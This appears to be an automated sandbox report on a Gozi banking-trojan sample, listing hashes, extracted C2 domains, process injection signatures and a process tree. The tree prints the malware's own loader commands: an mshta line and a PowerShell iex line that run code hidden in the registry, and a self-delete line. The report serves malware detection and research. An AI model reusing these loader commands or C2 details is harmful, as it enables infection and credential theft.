gozi | 1aa20713c9af2eeec3756392dca573d39bf5fa8d18a14087d67cd39f07509eea

Analysis

max time kernel
202s
max time network
235s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
06-10-2023 12:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEAS.1aa20713c9af2eeec3756392dca573d39bf5fa8d18a14087d67cd39f07509eea_JC.exe
Size

292KB
MD5

33ddb8880db29cac11e05bfc30bcec6b
SHA1

fb90dc44ba4b8f6b356735bd46231e6f99e15b62
SHA256

1aa20713c9af2eeec3756392dca573d39bf5fa8d18a14087d67cd39f07509eea
SHA512

b99e8ac3be923ea8eb21967595f93bef903b9719300045862dca54bf64b709f7c10e536d8407fa07da67e89245ffa15f9608531700a668b84d0a3a8383f51e0f
SSDEEP

3072:/yktbYYNGzHPg2I1eWy9O9El/pjBXDzrFEd1Uot:K4YIGz4ToTHl9BXz6Uo

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

mifrutty.com

systemcheck.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

568 cmd.exe

pid	process
568	cmd.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 852 set thread context of 1200	852	powershell.exe	Explorer.EXE
PID 1200 set thread context of 568	1200	Explorer.EXE	cmd.exe
PID 568 set thread context of 1056	568	cmd.exe	PING.EXE
PID 1200 set thread context of 2696	1200	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1056 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1056 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
1056	PING.EXE

pid	process
1056	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

NEAS.1aa20713c9af2eeec3756392dca573d39bf5fa8d18a14087d67cd39f07509eea_JC.exepowershell.exeExplorer.EXE

pid	process
2948	NEAS.1aa20713c9af2eeec3756392dca573d39bf5fa8d18a14087d67cd39f07509eea_JC.exe
852	powershell.exe
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE
1200	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1200 Explorer.EXE
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

852 powershell.exe
1200 Explorer.EXE
568 cmd.exe
1200 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 852 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

1200 Explorer.EXE

pid	process
1200	Explorer.EXE

pid	process
852	powershell.exe
1200	Explorer.EXE
568	cmd.exe
1200	Explorer.EXE

description	pid	process
Token: SeDebugPrivilege	852	powershell.exe

pid	process
1200	Explorer.EXE

Suspicious use of WriteProcessMemory 37 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3036 wrote to memory of 852	3036	mshta.exe	powershell.exe
PID 3036 wrote to memory of 852	3036	mshta.exe	powershell.exe
PID 3036 wrote to memory of 852	3036	mshta.exe	powershell.exe
PID 852 wrote to memory of 2044	852	powershell.exe	csc.exe
PID 852 wrote to memory of 2044	852	powershell.exe	csc.exe
PID 852 wrote to memory of 2044	852	powershell.exe	csc.exe
PID 2044 wrote to memory of 584	2044	csc.exe	cvtres.exe
PID 2044 wrote to memory of 584	2044	csc.exe	cvtres.exe
PID 2044 wrote to memory of 584	2044	csc.exe	cvtres.exe
PID 852 wrote to memory of 1268	852	powershell.exe	csc.exe
PID 852 wrote to memory of 1268	852	powershell.exe	csc.exe
PID 852 wrote to memory of 1268	852	powershell.exe	csc.exe
PID 1268 wrote to memory of 2404	1268	csc.exe	cvtres.exe
PID 1268 wrote to memory of 2404	1268	csc.exe	cvtres.exe
PID 1268 wrote to memory of 2404	1268	csc.exe	cvtres.exe
PID 852 wrote to memory of 1200	852	powershell.exe	Explorer.EXE
PID 852 wrote to memory of 1200	852	powershell.exe	Explorer.EXE
PID 852 wrote to memory of 1200	852	powershell.exe	Explorer.EXE
PID 1200 wrote to memory of 568	1200	Explorer.EXE	cmd.exe
PID 1200 wrote to memory of 568	1200	Explorer.EXE	cmd.exe
PID 1200 wrote to memory of 568	1200	Explorer.EXE	cmd.exe
PID 1200 wrote to memory of 568	1200	Explorer.EXE	cmd.exe
PID 1200 wrote to memory of 568	1200	Explorer.EXE	cmd.exe
PID 1200 wrote to memory of 568	1200	Explorer.EXE	cmd.exe
PID 568 wrote to memory of 1056	568	cmd.exe	PING.EXE
PID 568 wrote to memory of 1056	568	cmd.exe	PING.EXE
PID 568 wrote to memory of 1056	568	cmd.exe	PING.EXE
PID 568 wrote to memory of 1056	568	cmd.exe	PING.EXE
PID 1200 wrote to memory of 2696	1200	Explorer.EXE	cmd.exe
PID 1200 wrote to memory of 2696	1200	Explorer.EXE	cmd.exe
PID 1200 wrote to memory of 2696	1200	Explorer.EXE	cmd.exe
PID 1200 wrote to memory of 2696	1200	Explorer.EXE	cmd.exe
PID 1200 wrote to memory of 2696	1200	Explorer.EXE	cmd.exe
PID 568 wrote to memory of 1056	568	cmd.exe	PING.EXE
PID 568 wrote to memory of 1056	568	cmd.exe	PING.EXE
PID 1200 wrote to memory of 2696	1200	Explorer.EXE	cmd.exe
PID 1200 wrote to memory of 2696	1200	Explorer.EXE	cmd.exe

C:\Users\Admin\AppData\Local\Temp\NEAS.1aa20713c9af2eeec3756392dca573d39bf5fa8d18a14087d67cd39f07509eea_JC.exe
"C:\Users\Admin\AppData\Local\Temp\NEAS.1aa20713c9af2eeec3756392dca573d39bf5fa8d18a14087d67cd39f07509eea_JC.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:2948

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1200

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>P07p='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(P07p).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\C9426CAD-946D-E37B-E60D-08C77A91BCEB\\\UtilChar'));if(!window.flag)close()</script>"
2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:3036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wdxmslycg -value gp; new-alias -name ealyyjitw -value iex; ealyyjitw ([System.Text.Encoding]::ASCII.GetString((wdxmslycg "HKCU:Software\AppDataLow\Software\Microsoft\C9426CAD-946D-E37B-E60D-08C77A91BCEB").SettingsTime))
3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:852

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sogbjdv2.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2044

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99E0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC99DF.tmp"
5⤵
PID:584

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2njoq7gu.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1268

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9A5D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9A5C.tmp"
5⤵
PID:2404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\NEAS.1aa20713c9af2eeec3756392dca573d39bf5fa8d18a14087d67cd39f07509eea_JC.exe"
2⤵
- Deletes itself
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:568

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1056

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2njoq7gu.dll
Filesize
3KB

MD5
39f9ba6aa449f51ab75656921306fbf6

SHA1
039dfcbe2d21948c6d42a19b3ead26c062ad42a6

SHA256
ab750f799eaa7548bff776c2fd8409584b4d13ce69471035bf6863f3f7622791

SHA512
75711d9919bebd8d7cc33a4f9f482611467563d1e4cc2b56b2438a1a874472419204b215fdce358fdb0b9dd4410403cf9c87fb1a97622839b4a9e327e27f6adb

Download Submit
C:\Users\Admin\AppData\Local\Temp\2njoq7gu.pdb
Filesize
7KB

MD5
d95a9805c9d6432736cd4cbad2771a1d

SHA1
2bd160c3be92f2b7ea4eaefd4dddfd2a4c4569fe

SHA256
7a24cc38bc3f8af974c4d954696f104b84d73dfee78ff687952e15cf90dbf3fe

SHA512
2732cf96134a5b0082d95035159427c403548323fc24fa26272fe08287e8d5270972b2676f39d7840f3406925c9d1785643cd80a701ed56fd753a3d5169c47c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES99E0.tmp
Filesize
1KB

MD5
b28cf19f30e3cc16c56bb056639efacb

SHA1
c593cf22249200c0ee23b0900c3eff91bb56502f

SHA256
baf2448b810c1b316b0a6aaf76e4fb5c85ef330e984b80f487198ec2281a9c96

SHA512
9739eff024f40441b6fb61184abed53f189c9aeea91263c537fa9119adc32b66495c1b5babb6cf7b26b0d6f9715c0385d639047b00d1454a50ad01a1c11d0851

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9A5D.tmp
Filesize
1KB

MD5
9ccc14c95cbd334ee7f85c1c7b79dbc3

SHA1
ac4eea06446d9e04c56e01005f1b6b712f6a2986

SHA256
15d6db350d338a40b69190d68251795cc670b9047bcc7a67f9d65c8a038f7379

SHA512
583e9d7e21adcac508da76d37e0b7f4a3c269499fe9a3223dbb81b9b76e259a6fe770a274fb64f13ba1718769b1d58a57a8ad38454513faca0ea69ea2e187427

Download Submit
C:\Users\Admin\AppData\Local\Temp\sogbjdv2.dll
Filesize
3KB

MD5
5be387748b5938b4382128fde0450470

SHA1
c9bd2242c0b5b8169335b08b74ba7a05650aabc0

SHA256
ac39ab1228e2ae68f512f116c5ad0f6d0a3b5891830fb1db271b3e0b9de5b406

SHA512
e9fafc601b3ebcd1de62eabf2879b86234e5ce7f37c5ae0e1f02483bb1661577fc24360c1a674d52d1cf381509763c026caea2a23332016f2c2cb8fe182fbc75

Download Submit
C:\Users\Admin\AppData\Local\Temp\sogbjdv2.pdb
Filesize
7KB

MD5
d9ff2606721e4b82ff663b4ce33539e5

SHA1
799cc9c7983f6d7f5515550fbebece56e18ac9db

SHA256
0361b27ac9eabaed274184617f82b033076f9b8abc26b7f6bd6d95c2d7f151e0

SHA512
f2e2ecc79686229470713207e9257d4b7abb0bf4311bec23f527213e96f916472e35b54f94a04ed78b02084f000410d46a11236ebb71b1ece90c2c8f2f4eaf53

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2njoq7gu.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2njoq7gu.cmdline
Filesize
309B

MD5
e48faba5a35d947bfb3e23b72f1159a3

SHA1
420910adb02d1d8a91acaed10bfb7ba8ba53010d

SHA256
12813548b2c432a128b3aa32e70dd5891b6e0f0c0455eed50f9489fc971da3f8

SHA512
339fa1cfa84b4b12bc14b4553c1842b6626f19385a868f3fd0e0e59297dc16ee7ae3ba4b03b6ca4ebaf83f874b8ae8a3236f7dc4557e76b87dd02088eac974cd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC99DF.tmp
Filesize
652B

MD5
2001a7b347718df96f0d2feb3bae4221

SHA1
aaf169b093715b75d50a98c833ea5bfe32409e90

SHA256
fd5cad6fac80acdc754e8aa8ca05dd31b8dfdcbac40e4f6c1ddb82c13057759f

SHA512
6634d6fb2559113649ac091f579996203d092e22bc2e3da2d2e238dc7653dd7e153e0c5de9a144b5d4f4c09240000e05b2430ea75e912bb6b6c854cf5c60462a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC9A5C.tmp
Filesize
652B

MD5
edf76bfb85cb7dcb651435271186c832

SHA1
2ad824e1f80a269b12f8acc83b9e0acc7ced8749

SHA256
54616b2ec1d4cf0148cfcd2a72ca8a93efe12beb613a6cbc6ed2a3d3c129107c

SHA512
725a1d812821a788cf66dd6a17a8b720eaf3aeea149686b34036dd5973ec16b9cfd659045a3e9ad7ae3615ae4f7a9bb5b6ef73b6adbdb39fa769ad28ef4185ad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sogbjdv2.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\sogbjdv2.cmdline
Filesize
309B

MD5
d3bcb39fbb585394932753cc1eabe669

SHA1
0e177c465a9e723cb1de7b8bae7ca1ca5c609c84

SHA256
5ae1e8f648534d1674435d45921ce71ad9a7ab4562bf2d5e1e79264971008c28

SHA512
5e3f921c59d528dd95cef0d088dc70d5de5e9335d79c2d475227a1e877349ddc2a6ff2cf9db2a29bc64cde2ab2019479dabed6304591c2acd4a1d7a89b8ebd52

Download Submit
memory/568-77-0x0000000000280000-0x0000000000324000-memory.dmp

Filesize
656KB

Download
memory/568-95-0x0000000000280000-0x0000000000324000-memory.dmp

Filesize
656KB

Download
memory/568-74-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/568-75-0x0000000000110000-0x0000000000111000-memory.dmp

Filesize
4KB

Download
memory/852-42-0x00000000029A0000-0x00000000029A8000-memory.dmp

Filesize
32KB

Download
memory/852-59-0x00000000029B0000-0x00000000029B8000-memory.dmp

Filesize
32KB

Download
memory/852-62-0x00000000029D0000-0x0000000002A0D000-memory.dmp

Filesize
244KB

Download
memory/852-23-0x0000000001E50000-0x0000000001ED0000-memory.dmp

Filesize
512KB

Download
memory/852-22-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

Filesize
9.6MB

Download
memory/852-20-0x000000001B390000-0x000000001B672000-memory.dmp

Filesize
2.9MB

Download
memory/852-24-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

Filesize
9.6MB

Download
memory/852-25-0x0000000001E50000-0x0000000001ED0000-memory.dmp

Filesize
512KB

Download
memory/852-72-0x000007FEF5430000-0x000007FEF5DCD000-memory.dmp

Filesize
9.6MB

Download
memory/852-73-0x00000000029D0000-0x0000000002A0D000-memory.dmp

Filesize
244KB

Download
memory/852-21-0x0000000002620000-0x0000000002628000-memory.dmp

Filesize
32KB

Download
memory/852-27-0x0000000001E50000-0x0000000001ED0000-memory.dmp

Filesize
512KB

Download
memory/852-26-0x0000000001E50000-0x0000000001ED0000-memory.dmp

Filesize
512KB

Download
memory/1056-82-0x000007FFFFFD8000-0x000007FFFFFD9000-memory.dmp

Filesize
4KB

Download
memory/1056-84-0x0000000000180000-0x0000000000181000-memory.dmp

Filesize
4KB

Download
memory/1056-83-0x0000000001BC0000-0x0000000001C64000-memory.dmp

Filesize
656KB

Download
memory/1056-102-0x0000000001BC0000-0x0000000001C64000-memory.dmp

Filesize
656KB

Download
memory/1200-63-0x0000000004B00000-0x0000000004BA4000-memory.dmp

Filesize
656KB

Download
memory/1200-103-0x000000000AD00000-0x000000000AE3C000-memory.dmp

Filesize
1.2MB

Download
memory/1200-100-0x000000000AD00000-0x000000000AE3C000-memory.dmp

Filesize
1.2MB

Download
memory/1200-64-0x00000000029E0000-0x00000000029E1000-memory.dmp

Filesize
4KB

Download
memory/1200-96-0x000000000AD00000-0x000000000AE3C000-memory.dmp

Filesize
1.2MB

Download
memory/1200-94-0x0000000004B00000-0x0000000004BA4000-memory.dmp

Filesize
656KB

Download
memory/1268-50-0x0000000002280000-0x0000000002300000-memory.dmp

Filesize
512KB

Download
memory/2044-33-0x00000000020B0000-0x0000000002130000-memory.dmp

Filesize
512KB

Download
memory/2696-92-0x0000000000260000-0x00000000002F8000-memory.dmp

Filesize
608KB

Download
memory/2696-93-0x0000000000260000-0x00000000002F8000-memory.dmp

Filesize
608KB

Download
memory/2696-88-0x0000000000260000-0x00000000002F8000-memory.dmp

Filesize
608KB

Download
memory/2696-91-0x0000000000300000-0x0000000000301000-memory.dmp

Filesize
4KB

Download
memory/2948-7-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2948-9-0x0000000000220000-0x000000000022B000-memory.dmp

Filesize
44KB

Download
memory/2948-8-0x0000000002320000-0x0000000002420000-memory.dmp

Filesize
1024KB

Download
memory/2948-15-0x0000000004A30000-0x0000000004A32000-memory.dmp

Filesize
8KB

Download
memory/2948-1-0x0000000002320000-0x0000000002420000-memory.dmp

Filesize
1024KB

Download
memory/2948-4-0x0000000000310000-0x000000000031D000-memory.dmp

Filesize
52KB

Download
memory/2948-3-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2948-2-0x0000000000220000-0x000000000022B000-memory.dmp

Filesize
44KB

Download